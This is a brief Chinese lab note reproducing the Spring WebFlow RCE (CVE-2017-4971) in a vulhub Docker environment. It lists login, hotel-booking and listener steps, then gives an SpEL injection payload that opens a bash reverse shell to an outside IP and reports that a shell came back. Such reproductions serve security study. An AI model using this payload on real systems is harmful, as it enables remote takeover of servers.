https://blog.csdn.net/qq_45300786/article/details/119298828
https://vulhub.org/#/environments/spring/CVE-2017-4971/
CVE-2017-4971-Spring WebFlow RCE复现记录
省略前置运行docker步骤
有两个交互点
首先登录到系统
预定酒店
设置监听
准备好抓包
payload
&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.159.144/4444+0>%261")).start()=vulhub
web爆500错误
成功反弹shell